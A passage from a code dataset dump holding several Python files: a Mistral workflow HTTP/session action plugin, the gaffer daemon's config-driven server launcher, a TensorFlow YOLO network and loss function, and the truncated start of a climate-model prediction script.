datetime.datetime.now().strftime('%H:%M:%S')\n\t\tprint(date + ' WLAN disconnect')\n\t\tself.summary = '--'\n\t\tself.temperature = '--'\n","sub_path":"classes/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"204113548","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport time\nimport traceback\nimport six\nimport json\n\nfrom mistral import exceptions as exc\nfrom mistral.actions.std_actions import 
NoOpAction\nimport mistral.actions.if_session as ses\nimport mistral.actions.eureka_client as eureka\nfrom mistral.utils import kfk_etypes\nfrom mistral.utils import kfk_trace\nfrom mistral_lib import actions\nfrom oslo_log import log as logging\n\nfrom mie.xlogger.klog import klog\nfrom mie.bprint import varfmt, todict\nimport mie.confcenter\n\nLOG = logging.getLogger(__name__)\nconf = mie.confcenter.getdefcc()\n\n#\n# yihe.Session\n#\nclass Session(NoOpAction):\n '''\n action yihe.Session cmd=Create ...\n '''\n def __init__(self, action_context, cmd, psid=None, sid=None):\n actx = action_context\n klog.d(\" ACTX : \" + str(varfmt(actx)))\n klog.d(\" CMD : \" + str(cmd))\n klog.d(\" PSID : \" + str(psid))\n klog.d(\" SID : \" + str(sid))\n\n self.cmd = cmd\n self.actx = actx\n self.psid = psid\n self.sid = sid\n\n def run(self, context):\n klog.d(\"CMD: \", self.cmd)\n klog.d(varfmt(context))\n if self.cmd == \"create\":\n # Get content information\n # action_execution_id = self.actx.get(\"action_execution_id\")\n # task_id = self.actx.get(\"task_id\")\n # task_name = self.actx.get(\"task_name\")\n workflow_execution_id = self.actx.get(\"workflow_execution_id\")\n # workflow_name = self.actx.get(\"workflow_name\")\n\n sid = self.psid or workflow_execution_id\n # sesCreate return a session ID.\n res = {\n \"content\": ses.sesCreate(sid, workflow_execution_id)\n }\n\n if self.cmd == \"rollback\":\n res = ses.sesRollback(self.sid)\n\n klog.d(varfmt(res))\n return res\n\n def test(self, context):\n return None\n\n\n#\n# yihe.Sync\n#\nclass Sync(actions.Action):\n def orgInit(self,\n url,\n method=\"GET\",\n params=None,\n body=None,\n headers=None,\n cookies=None,\n auth=None,\n timeout=None,\n allow_redirects=None,\n proxies=None,\n verify=None):\n\n if auth and len(auth.split(':')) == 2:\n self.auth = (auth.split(':')[0], auth.split(':')[1])\n else:\n self.auth = auth\n\n if isinstance(headers, dict):\n for key, val in headers.items():\n if isinstance(val, (six.integer_types, float)):\n headers[key] = str(val)\n\n self.url = url\n self.method = method\n self.params = params\n\n if isinstance(body, dict):\n body = json.dumps(body, ensure_ascii=False)\n if body:\n body = body.encode(\"utf-8\")\n self.body = body\n\n self.headers = headers\n self.cookies = cookies\n self.timeout = timeout\n self.allow_redirects = allow_redirects\n self.proxies = proxies\n self.verify = verify\n\n def __init__(self,\n action_context,\n url,\n method=\"GET\",\n params=None,\n body=None,\n atom=None,\n session=None,\n headers=None,\n cookies=None,\n auth=None,\n timeout=None,\n allow_redirects=None,\n proxies=None,\n verify=None):\n self.ts_init_start = time.time()\n klog.d(\"INTO YIHE.SYNC\")\n\n actx = action_context\n\n # 1. 
Strip the session info\n klog.d(\" URL : \" + str(url))\n klog.d(\"METHOD : \" + str(method))\n klog.d(\" BODY : \" + str(body))\n klog.d(\" HDRS : \" + str(headers))\n klog.d(\" PARAM : \" + str(params))\n klog.d(\" ACTX : \" + str(varfmt(actx)))\n\n # FIXME: how to process the atomID\n self.atom = atom\n self.session = session\n\n sesEna = conf.SES_ENA and session\n hookEna = conf.HOOK\n # klog.d(\"Session or NOT:\", sesEna, \" In config:\", conf.SES_ENA, \" Session Id:\", session)\n\n self.skipRun = False\n\n # Get content information\n self.action_execution_id = actx.get(\"action_execution_id\")\n self.task_id = actx.get(\"task_id\")\n self.task_name = actx.get(\"task_name\")\n self.workflow_execution_id = actx.get(\"workflow_execution_id\")\n self.workflow_name = actx.get(\"workflow_name\")\n\n if hookEna:\n # FIXME: Provide a chance to modify the input and output.\n pass\n\n '''\n\n exid = actx.get(\"action_execution_id\")\n hookInfo = db_get_hook_info(exid)\n if hookInfo:\n self.skipRun = hookInfo.skipRun\n\n self.input = hookInfo.input\n\n # Only once\n db_mark_used(exid)\n\n #\n # Overwrite All the parameters and DO NOT overwrite key\n # parameters\n #\n url = _url or url\n body = _body or body\n '''\n\n # Overwrite the rerun input and/or output\n self.rrInput = self.rrOutput = None\n\n self.ts_ses_start = self.ts_ses_end = 0\n if sesEna:\n klog.d(\"Process session\")\n\n self.ts_ses_start = time.time()\n dic = {\n \"x__sid\": session,\n\n \"url\": url,\n \"method\": method,\n \"body\": body,\n \"headers\": headers,\n \"params\": params,\n \"actx\": actx,\n \"cookies\": cookies,\n \"auth\": auth,\n \"allow_redirects\": allow_redirects,\n \"proxies\": proxies,\n \"verify\": verify,\n }\n ses.sesPush(session, dic)\n self.ts_ses_end = time.time()\n\n self.orgInit(\n url,\n method,\n params,\n body,\n headers,\n cookies,\n auth,\n timeout,\n allow_redirects,\n proxies,\n verify,\n )\n klog.d()\n self.ts_init_end = time.time()\n\n def orgRun(self, context):\n LOG.info(\n \"Running HTTP action \"\n \"[url=%s, method=%s, params=%s, body=%s, headers=%s,\"\n \" cookies=%s, auth=%s, timeout=%s, allow_redirects=%s,\"\n \" proxies=%s, verify=%s]\",\n self.url,\n self.method,\n self.params,\n self.body,\n self.headers,\n self.cookies,\n self.auth,\n self.timeout,\n self.allow_redirects,\n self.proxies,\n self.verify\n )\n\n try:\n resp = requests.request(\n self.method,\n self.url,\n params=self.params,\n data=self.body,\n headers=self.headers,\n cookies=self.cookies,\n auth=self.auth,\n timeout=self.timeout,\n allow_redirects=self.allow_redirects,\n proxies=self.proxies,\n verify=self.verify\n )\n except Exception as e:\n raise exc.ActionException(\"Failed to send HTTP request: %s\" % e)\n\n LOG.info(\n \"HTTP action response:\\n%s\\n%s\",\n resp.status_code,\n resp.content\n )\n\n # TODO(akuznetsova): Need to refactor Mistral serialiser and\n # deserializer to have an ability to pass needed encoding and work\n # with it. 
Now it can process only default 'utf-8' encoding.\n # Appropriate bug #1676411 was created.\n\n # Represent important resp data as a dictionary.\n try:\n content = resp.json(encoding=resp.encoding)\n except Exception as e:\n LOG.debug(\"HTTP action response is not json.\")\n content = resp.content\n if content and resp.encoding != 'utf-8':\n content = content.decode(resp.encoding).encode('utf-8')\n\n _result = {\n 'content': content,\n 'status': resp.status_code,\n 'headers': dict(resp.headers.items()),\n 'url': resp.url,\n 'history': resp.history,\n 'encoding': resp.encoding,\n 'reason': resp.reason,\n 'cookies': dict(resp.cookies.items()),\n 'elapsed': resp.elapsed.total_seconds()\n }\n\n if resp.status_code not in range(200, 307):\n return actions.Result(error=_result)\n\n return _result\n\n def run(self, context):\n self.ts_run_start = time.time()\n\n if not self.skipRun:\n # TODO: replace input with self.rrInput\n # if self.rrInput:\n # pass\n\n klog.d(varfmt(self))\n # klog.d(varfmt(context))\n klog.d(\">>> Run action\")\n res = self.orgRun(context)\n\n klog.d(\"<<< Run action\")\n klog.d(varfmt(res))\n try:\n _input = todict(self)\n except:\n _input = None\n try:\n _output = todict(res)\n except:\n _output = None\n\n kfk_trace.log(kfk_etypes.TASK_ACTION, self.atom, \"RUNNING\",\n self.workflow_name, self.workflow_execution_id,\n self.task_id, self.task_name,\n _input, _output, None)\n\n else:\n klog.d(\"YIHE.Sync.run skipped\")\n\n # TODO: replace output with self.rrOutput\n if self.rrOutput:\n pass\n\n self.ts_run_end = time.time()\n\n klog.d(\"TIME: Init total: \", self.ts_init_end - self.ts_init_start)\n klog.d(\"TIME: Run total: \", self.ts_run_end - self.ts_run_start)\n klog.d(\"TIME: Action Total: \", self.ts_run_end - self.ts_init_start)\n if self.ts_ses_end:\n klog.d(\"TIME: Session Total: \", self.ts_ses_end - self.ts_ses_start)\n\n return res\n\n\nclass Async(Sync):\n def __init__(self,\n action_context,\n url,\n method=\"GET\",\n params=None,\n body=None,\n atom=None,\n session=None,\n headers=None,\n cookies=None,\n auth=None,\n timeout=None,\n allow_redirects=None,\n proxies=None,\n verify=None):\n\n actx = action_context\n\n ck_url = actx.get('callback_url')\n if conf.EUREKA_ENABLE:\n host = eureka.get_app_url(conf.APP_NAME_CALLBACK)\n ck_url = host + ck_url\n klog.d(\"Eureka enable, CK_URL:\", ck_url)\n\n headers = headers or {}\n headers.update({\n 'Workflow-Name': actx.get('workflow_name'),\n 'Workflow-Execution-Id': actx.get('workflow_execution_id'),\n 'Task-Id': actx.get('task_id'),\n 'Action-Execution-Id': actx.get('action_execution_id'),\n 'Callback-URL': ck_url,\n })\n\n super(Async, self).__init__(\n action_context,\n url,\n method,\n params,\n body,\n atom,\n session,\n headers,\n cookies,\n auth,\n timeout,\n allow_redirects,\n proxies,\n verify,\n )\n\n def is_sync(self):\n return False\n\n def test(self, context):\n return None\n\n# vim: sw=4 ts=4 sts=4 ai et\n","sub_path":"yhmistral/plugin/yeehaw_action.py","file_name":"yeehaw_action.py","file_ext":"py","file_size_in_byte":11673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"184695669","text":"# -*- coding: utf-8 -\n#\n# This file is part of gaffer. 
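orgRun above folds a requests response into a plain dict and treats any status outside 200-306 as an error result; a self-contained sketch of that conversion (the httpbin URL is only an example, and a network connection is assumed):

import requests

resp = requests.get("https://httpbin.org/json")
result = {
    "content": resp.content,
    "status": resp.status_code,
    "headers": dict(resp.headers.items()),
    "url": resp.url,
    "reason": resp.reason,
    "elapsed": resp.elapsed.total_seconds(),
}
# mirror of the success test in orgRun: 2xx and redirects count as OK
is_error = resp.status_code not in range(200, 307)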
See the NOTICE for more information.\n\nimport argparse\nimport fnmatch\ntry:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\nimport os\nimport sys\n\nimport six\n\nfrom ..console_output import ConsoleOutput\nfrom ..http_handler import HttpHandler, HttpEndpoint\nfrom ..manager import Manager\nfrom ..pidfile import Pidfile\nfrom ..sig_handler import SigHandler\nfrom ..state import FlappingInfo\nfrom ..util import daemonize, setproctitle_\nfrom ..webhooks import WebHooks\n\nfrom .plugins import PluginManager\nfrom .util import user_path\n\nENDPOINT_DEFAULTS = dict(\n uri = None,\n backlog = 128,\n ssl_options = {})\n\nPROCESS_DEFAULTS = dict(\n group = None,\n args = None,\n env = {},\n uid = None,\n gid = None,\n cwd = None,\n detach = False,\n shell = False,\n os_env = True,\n numprocesses = 1,\n start = True,\n priority = six.MAXSIZE)\n\nclass DefaultConfigParser(configparser.ConfigParser):\n \"\"\" object overriding ConfigParser to return defaults values instead\n of raising an error if needed \"\"\"\n\n def dget(self, section, option, default=None):\n if not self.has_option(section, option):\n return default\n return self.get(section, option)\n\n def dgetint(self, section, option, default=None):\n if not self.has_option(section, option):\n return default\n return self.getint(section, option)\n\n def dgetboolean(self, section, option, default=None):\n if not self.has_option(section, option):\n return default\n return self.getboolean(section, option)\n\n\nclass Server(object):\n \"\"\" Server object used for gafferd \"\"\"\n\n def __init__(self, args):\n self.args = args\n self.cfg = None\n\n config_file = args.config or args.config_file\n if not config_file:\n self.set_defaults()\n else:\n self.parse_config(config_file)\n\n self.manager = Manager()\n self.plugin_manager = PluginManager(self.plugins_dir)\n\n def default_endpoint(self):\n params = ENDPOINT_DEFAULTS.copy()\n\n if self.args.backlog:\n params['backlog'] = self.args.backlog\n\n if self.args.certfile:\n params['ssl_options']['certfile'] = self.args.certfile\n\n if self.args.keyfile:\n params['ssl_options']['keyfile'] = self.args.keyfile\n\n if not params['ssl_options']:\n del params['ssl_options']\n\n params['uri'] = self.args.bind or '127.0.0.1:5000'\n return HttpEndpoint(**params)\n\n def set_defaults(self):\n self.plugins_dir = self.args.plugins_dir\n self.webhooks = []\n self.endpoints = [self.default_endpoint()]\n self.processes = []\n\n def run(self):\n # check if any plugin dependancy is missing\n self.plugin_manager.check_mandatory()\n\n # setup the http api\n static_sites = self.plugin_manager.get_sites()\n http_handler = HttpHandler(endpoints=self.endpoints,\n handlers=static_sites)\n\n # setup gaffer apps\n apps = [SigHandler(),\n WebHooks(hooks=self.webhooks),\n http_handler]\n\n # extend with plugin apps\n plugin_apps = self.plugin_manager.get_apps(self.cfg)\n apps.extend(plugin_apps)\n\n # verbose mode\n if self.args.verboseful:\n apps.append(ConsoleOutput(actions=['.']))\n elif self.args.verbose:\n apps.append(ConsoleOutput(output_streams=False,\n actions=['.']))\n\n self.manager.start(apps=apps)\n\n # add processes\n for name, cmd, params in self.processes:\n self.manager.add_process(name, cmd, **params)\n\n # run the main loop\n self.manager.run()\n\n def read_config(self, config_path):\n cfg = DefaultConfigParser()\n with open(config_path) as f:\n cfg.readfp(f)\n cfg_files_read = [config_path]\n\n # load included config files\n includes = []\n for include_file in 
cfg.dget('gaffer', 'include', '').split():\n includes.append(include_file)\n\n for include_dir in cfg.dget('gaffer', 'include_dir', '').split():\n for root, dirnames, filenames in os.walk(include_dir):\n for filename in fnmatch.filter(filenames, '*.ini'):\n cfg_file = os.path.join(root, filename)\n includes.append(cfg_file)\n\n cfg_files_read.extend(cfg.read(includes))\n\n return cfg, cfg_files_read\n\n def parse_config(self, config_file):\n cfg, cfg_files_read = self.read_config(config_file)\n self.cfg = cfg\n\n self.plugins_dir = cfg.dget('gaffer', 'plugins_dir',\n self.args.plugins_dir)\n\n # you can setup multiple endpoints in the config\n endpoints_str = cfg.dget('gaffer', 'http_endpoints', '')\n endpoints_names = endpoints_str.split(\",\")\n\n endpoints = []\n processes = []\n webhooks = []\n envs = {}\n for section in cfg.sections():\n if section.startswith('endpoint:'):\n name = section.split(\"endpoint:\", 1)[1]\n if name in endpoints_names:\n kwargs = ENDPOINT_DEFAULTS.copy()\n\n for key, val in cfg.items(section):\n if key == \"bind\":\n kwargs['uri'] = val\n elif key == \"backlog\":\n kwargs = cfg.dgetint(section, key, 128)\n elif key == \"certfile\":\n kwargs['ssl_options'][key] = val\n elif key == \"keyfile\":\n kwargs['ssl_options'][key] = val\n\n if not kwargs['ssl_options']:\n kwargs['ssl_options'] = None\n if kwargs.get('uri') is not None:\n endpoints.append(HttpEndpoint(**kwargs))\n elif section.startswith('process:'):\n name = section.split(\"process:\", 1)[1]\n cmd = cfg.dget(section, 'cmd', '')\n if cmd:\n params = PROCESS_DEFAULTS.copy()\n for key, val in cfg.items(section):\n if key == \"args\":\n params[key] = val\n elif key.startswith('env:'):\n envname = key.split(\"env:\", 1)[1]\n params['env'][envname] = val\n elif key == 'uid':\n params[key] = val\n elif key == 'gid':\n params[key] = val\n elif key == 'cwd':\n params[key] = val\n elif key == 'detach':\n params[key] = cfg.dgetboolean(section, key,\n False)\n elif key == 'shell':\n params[key] = cfg.dgetboolean(section, key,\n False)\n elif key == 'os_env':\n params[key] = cfg.dgetboolean(section, key,\n True)\n elif key == 'numprocesses':\n params[key] = cfg.dgetint(section, key, 1)\n elif key == 'start':\n params[key] = cfg.dgetboolean(section, key,\n True)\n elif key == 'flapping':\n # flapping values are passed in order on one\n # line\n values_str = val.split(None)\n try:\n values = [float(val) for val in values_str]\n params['flapping'] = FlappingInfo(*values)\n except ValueError:\n pass\n elif key == \"redirect_output\":\n params[key] = [v.strip() for v in val.split(\",\")]\n elif key == \"redirect_input\":\n params[key] = cfg.dgetboolean(section, key,\n False)\n elif key == \"graceful_timeout\":\n params[key] = cfg.dgetint(section, key, 10)\n elif key == \"priority\":\n params[key] = cfg.dgetint(section, key,\n six.MAXSIZE)\n\n processes.append((name, cmd, params))\n elif section == \"webhooks\":\n for key, val in cfg.items(section):\n webhooks.append((key, val))\n elif section.startswith('env:'):\n pname = section.split(\"env:\", 1)[1]\n kvs = [(key.upper(), val) for key, val in cfg.items(section)]\n envs[pname] = dict(kvs)\n\n # add environment variables\n for name, cmd, params in processes:\n if name in envs:\n params['env'] = envs[name]\n\n # sort processes by priority\n processes = sorted(processes, key=lambda p: p[2]['priority'])\n\n if not endpoints:\n # we create a default endpoint\n endpoints = [self.default_endpoint()]\n\n self.endpoints = endpoints\n self.webhooks = webhooks\n self.processes = 
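parse_config above leans on the dget/dgetint/dgetboolean fallbacks of DefaultConfigParser; a Python 3 re-sketch of that defaulting-parser idea (stdlib configparser; names here are illustrative, not gaffer's actual API):

import configparser

class DefaultingParser(configparser.ConfigParser):
    # return a default instead of raising when an option is absent
    def dget(self, section, option, default=None):
        if not self.has_option(section, option):
            return default
        return self.get(section, option)

cfg = DefaultingParser()
cfg.read_string("[gaffer]\nhttp_endpoints = public\n")
assert cfg.dget("gaffer", "http_endpoints") == "public"
assert cfg.dget("gaffer", "missing", "fallback") == "fallback"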
processes\n\ndef run():\n # default plugins dir\n plugins_dir = os.path.join(user_path(), \"plugins\")\n\n # define the argument parser\n parser = argparse.ArgumentParser(description='Run some watchers.')\n parser.add_argument('config', help='configuration file',\n nargs='?')\n\n parser.add_argument('-c', '--config', dest='config_file',\n help='configuration file')\n parser.add_argument('-p', '--plugins-dir', dest='plugins_dir',\n help=\"default plugin dir\", default=plugins_dir),\n\n parser.add_argument('-v', dest='verbose', action='store_true',\n help=\"verbose mode\")\n parser.add_argument('-vv', dest='verboseful', action='store_true',\n help=\"like verbose mode but output stream too\")\n parser.add_argument('--daemon', dest='daemonize', action='store_true',\n help=\"Start gaffer in the background\")\n parser.add_argument('--pidfile', dest='pidfile')\n parser.add_argument('--bind', dest='bind',\n default='127.0.0.1:5000', help=\"default HTTP binding\"),\n parser.add_argument('--certfile', dest='certfile',\n help=\"SSL certificate file for the default binding\"),\n parser.add_argument('--keyfile', dest='keyfile',\n help=\"SSL key file for the default binding\"),\n parser.add_argument('--backlog', dest='backlog', type=int,\n default=128, help=\"default backlog\"),\n\n args = parser.parse_args()\n\n if args.daemonize:\n daemonize()\n\n setproctitle_(\"gafferd\")\n\n pidfile = None\n if args.pidfile:\n pidfile = Pidfile(args.pidfile)\n\n try:\n pidfile.create(os.getpid())\n except RuntimeError as e:\n print(str(e))\n sys.exit(1)\n\n s = Server(args)\n\n try:\n s.run()\n except KeyboardInterrupt:\n pass\n finally:\n if pidfile is not None:\n pidfile.unlink()\n\n sys.exit(0)\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"gaffer/node/gafferd.py","file_name":"gafferd.py","file_ext":"py","file_size_in_byte":11520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309671506","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Author : IslandLiu\n# Date : 19-2-21\n\n\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport os\nimport config as cfg\nfrom utils import tf_utils, calculate_iou\n\n\ndef get_model(images):\n \"\"\"\n Build YOLO net\n :param images: 4-D tensor [cfg.BATCH_SIZE, image_height, image_width, channel]\n :return:\n predicts: 4-D tensor [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, num_classes + 5 * cfg.BOXES_PER_CELL]\n \"\"\"\n cfg.BATCH_SIZE = images.get_shape()[0].value\n net = tf_utils.conv2d(inputs=images,\n num_output_channels=64,\n kernel_size=[7, 7],\n scope='conv',\n stride=(2, 2))\n net = tf_utils.max_pool2d(inputs=net,\n kernel_size=[2, 2],\n scope='max_pool',\n stride=[2, 2])\n net = tf_utils.conv2d(inputs=net,\n num_output_channels=192,\n kernel_size=[3, 3],\n scope='conv',\n stride=(1, 1))\n\n net = tf_utils.max_pool2d(inputs=net,\n kernel_size=(2, 2),\n scope='max_pool',\n stride=(2, 2))\n net = tf_utils.conv2d(net, 128, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 256, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 256, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 512, (3, 3), scope='conv')\n\n net = tf_utils.max_pool2d(net, (2, 2), scope='max_pool')\n\n for i in range(4):\n net = tf_utils.conv2d(net, 256, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 512, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 512, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.max_pool2d(net, (2, 2), scope='max_pool')\n\n 
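run() in the gafferd record above wraps the daemon's lifetime in a pidfile create/unlink pair; a stdlib-only sketch of that guard (a hypothetical minimal stand-in, not gaffer's actual Pidfile class, and the path is just an example):

import os

class Pidfile(object):
    def __init__(self, path):
        self.path = path

    def create(self, pid):
        # refuse to start twice: an existing file means another instance runs
        if os.path.exists(self.path):
            raise RuntimeError("pidfile %s already exists" % self.path)
        with open(self.path, "w") as f:
            f.write(str(pid))

    def unlink(self):
        try:
            os.unlink(self.path)
        except OSError:
            pass

pidfile = Pidfile("/tmp/gafferd.pid.example")
pidfile.create(os.getpid())
try:
    pass  # the daemon's main loop would run here
finally:
    pidfile.unlink()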
for i in range(2):\n net = tf_utils.conv2d(net, 512, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n # Fully connected layer\n net = tf.reshape(net, [cfg.BATCH_SIZE, -1])\n net = tf_utils.fully_connected(net, 4096, scope='fc')\n net = tf.nn.dropout(net, keep_prob=0.5)\n net = tf_utils.fully_connected(net, 7 * 7 * 30, scope='fc')\n predicts = tf.reshape(net, [cfg.BATCH_SIZE, 7, 7, 30])\n\n return predicts\n\n\ndef get_loss(predicts, labels):\n \"\"\"\n Calculate loss\n :param predicts: 4-D tensor [cfg.BATCH_SIZE, 7, 7, 30]\n :param labels: 4-D tensor [cfg.BATCH_SIZE, 7, 7 25]\n :return:loss\n \"\"\"\n # [bs, 7, 7, 0:2]为预测的置信度 -> [bs, 7, 7, 2]\n predicts_confidence = predicts[..., 0:cfg.BOXES_PER_CELL],\n # [bs, 7, 7, 2:10]为预测的bounding_box的坐标 -> [bs, 7, 7, 2, 4]\n predicts_boxes = tf.reshape(predicts[..., cfg.BOXES_PER_CELL:(5 * cfg.BOXES_PER_CELL)],\n [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, cfg.BOXES_PER_CELL, 4])\n # [bs, 7, 7, 10:]为预测的class的概率值 -> [bs, 7, 7, 20]\n predicts_class = predicts[..., (5 * cfg.BOXES_PER_CELL):]\n\n # 标签置信度[bs, 7, 7, 1]\n labels_confidence = tf.reshape(labels[..., 0], (cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, 1))\n # 标签bounding_box,因为只有一个,形如[bs, 7, 7, 1, 4], 所以利用tf.tile(), 变为[bs, 7, 7, 2, 4]\n labels_boxes = tf.reshape(labels[..., 1:5],\n [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, 1, 4])\n labels_boxes = tf.tile(labels_boxes, [1, 1, 1, 2, 1])\n # 标签的class [bs, 7, 7, 20]\n labels_class = labels[..., 5:]\n\n # predicts_boxes中的值是经过归一化处理的,所以要还原\n # offset最后的形如[bs, 7, 7, 2]\n offset = np.reshape(np.array([np.arange(cfg.CELL_SIZE)] * cfg.CELL_SIZE * cfg.BOXES_PER_CELL), [2, 7, 7])\n offset = np.transpose(offset, (1, 2, 0))\n offset = tf.cast(offset, dtype=tf.float32)\n offset = tf.reshape(offset, [1, cfg.CELL_SIZE, cfg.CELL_SIZE, cfg.BOXES_PER_CELL])\n offset_x = tf.tile(offset, [cfg.BATCH_SIZE, 1, 1, 1])\n offset_y = tf.transpose(offset_x, (0, 2, 1, 3))\n predicts_boxes_tran = tf.stack([(predicts_boxes[..., 0] + offset_x) * cfg.IMAGE_SIZE / cfg.CELL_SIZE,\n (predicts_boxes[..., 1] + offset_y) * cfg.IMAGE_SIZE / cfg.CELL_SIZE,\n tf.square(predicts_boxes[..., 2] * cfg.IMAGE_SIZE),\n tf.square(predicts_boxes[..., 3] * cfg.IMAGE_SIZE)], axis=-1)\n\n # calculate iou (shape[cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, cfg.BOXES_PER_CELL]\n iou = calculate_iou.cal_iou(predicts_boxes_tran, labels_boxes)\n\n # create mask\n object_mask = tf.reduce_max(iou, axis=3, keepdims=True)\n object_mask = tf.cast((iou >= object_mask), tf.float32) * labels_confidence\n\n no_object_mask = tf.ones_like(object_mask, dtype=tf.float32) - object_mask\n\n # normalize the label_boxes\n labels_boxes_nor = tf.stack([labels_boxes[:, :, :, :, 0] * cfg.CELL_SIZE / cfg.IMAGE_SIZE - offset_x,\n labels_boxes[:, :, :, :, 1] * cfg.CELL_SIZE / cfg.IMAGE_SIZE - offset_y,\n tf.sqrt(labels_boxes[:, :, :, :, 2] / cfg.IMAGE_SIZE),\n tf.sqrt(labels_boxes[:, :, :, :, 3] / cfg.IMAGE_SIZE)], axis=-1)\n # calculate loss\n # class loss (tensor shape [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, classes_num])\n class_delta = (predicts_class - labels_class) * labels_confidence\n class_loss = tf.reduce_mean(tf.reduce_sum(tf.square(class_delta), axis=[1, 2, 3]), name='class_loss')\n # object_loss\n object_delta = (predicts_confidence - 
iou) * object_mask\n object_loss = tf.reduce_mean(tf.reduce_sum(tf.square(object_delta), axis=[1, 2, 3]), name='object_loss')\n object_loss = cfg.OBJECTS_SCALE * object_loss\n # no_object_loss\n no_object_delta = (predicts_confidence - iou) * no_object_mask\n no_object_loss = tf.reduce_mean(tf.reduce_sum(tf.square(no_object_delta), axis=[1, 2, 3]), name='nonobject_loss')\n no_object_loss = cfg.NO_OBJECTS_SCALE * no_object_loss\n # coordinate loss\n coord_mask = tf.expand_dims(object_mask, axis=4)\n coord_delta = (predicts_boxes - labels_boxes_nor) * coord_mask\n coord_loss = tf.reduce_mean(tf.reduce_sum(coord_delta, axis=[1, 2, 3, 4]), name='coor_loss')\n coord_loss = cfg.COORDS_SCALE * coord_loss\n\n tf.losses.add_loss(class_loss)\n tf.losses.add_loss(object_loss)\n tf.losses.add_loss(no_object_loss)\n tf.losses.add_loss(coord_loss)\n\n tf.summary.scalar('class_loss', class_loss)\n tf.summary.scalar('object_loss', object_loss)\n tf.summary.scalar('no_object_loss', no_object_loss)\n tf.summary.scalar('coord_loss', coord_loss)\n\n # tf.summary.histogram('iou', iou)\n\n total_loss = tf.losses.get_total_loss()\n return total_loss\n\n\nif __name__ == '__main__':\n with tf.Graph().as_default():\n inputs = tf.random_normal(shape=(45, 448, 448, 3))\n labels = tf.ones((45, 7, 7, 25))\n outputs = get_model(inputs)\n loss = get_loss(outputs, labels)\n init_op = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init_op)\n sess.run(outputs)\n total_losses = sess.run(loss)\n\n print(outputs)\n print(total_losses)\n","sub_path":"models/yolo_net.py","file_name":"yolo_net.py","file_ext":"py","file_size_in_byte":7682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"360626315","text":"# set random seeds\nimport numpy as np\nnp.random.seed(0)\nfrom tensorflow import set_random_seed\nset_random_seed(0)\n\nimport os\nimport sys\nimport argparse\nsys.path.append('../')\nsys.path.append('../../../')\n\nfrom cbrain.data_generator import *\nfrom cbrain.losses import *\nfrom cbrain.layers import *\nfrom cbrain.cam_constants import *\n\nfrom utils import build_directory\nfrom cbrain.utils import limit_mem\nfrom stored_dictionaries.data_options import data_opts\nfrom tensorflow.keras.models import *\n\nparser = argparse.ArgumentParser()\n# python3.6 predict.py --loss_type mse --net_type normal --data 8col --model_path\n# ---------------- Important parameters -------------------------\nparser.add_argument('--loss_type', type=str, default='mse', choices=['mse', 'weak_loss'], help='What to run?')\nparser.add_argument('--net_type', type=str, default='normal', choices=['normal', 'conservation'], help='What to run?')\nparser.add_argument('--data', type=str, choices=['fluxbypass_aqua', 'land_data', '8col', '32col'])\nparser.add_argument('--model_path', type=str)\nparser.add_argument('--alg', type=str, default='')\n\n# params okay left as defaults\nparser.add_argument('--batch_size', type=int, default=2048, help='Batch size')\nparser.add_argument('--data_dir', type=str, default='/baldig/chemistry/earth_system_science/')\nparser.add_argument('--patience', type=int, default=10, help='How long to wait for an improvement')\n\nFLAGS = parser.parse_args()\n\n# Otherwise tensorflow will use ALL your GPU RAM for no reason\nlimit_mem()\noutput_path = '{data_dir}{data}/{net_type}_{loss_type}/'.format(\n data_dir=FLAGS.data_dir,\n data=FLAGS.data,\n net_type=FLAGS.net_type,\n loss_type=FLAGS.loss_type,\n alg=FLAGS.alg\n); build_directory(output_path)\n\nif 
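The confidence targets in the YOLO loss above come from cal_iou; a plain-Python IoU for a single pair of (center_x, center_y, w, h) boxes, as a hedged scalar stand-in for the tensor version:

def iou_xywh(box_a, box_b):
    # convert center/size to corner coordinates
    ax1, ay1 = box_a[0] - box_a[2] / 2.0, box_a[1] - box_a[3] / 2.0
    ax2, ay2 = box_a[0] + box_a[2] / 2.0, box_a[1] + box_a[3] / 2.0
    bx1, by1 = box_b[0] - box_b[2] / 2.0, box_b[1] - box_b[3] / 2.0
    bx2, by2 = box_b[0] + box_b[2] / 2.0, box_b[1] + box_b[3] / 2.0
    # intersection is clamped at zero when the boxes do not overlap
    iw = max(0.0, min(ax2, bx2) - max(ax1, bx1))
    ih = max(0.0, min(ay2, by2) - max(ay1, by1))
    inter = iw * ih
    union = box_a[2] * box_a[3] + box_b[2] * box_b[3] - inter
    return inter / union if union > 0 else 0.0

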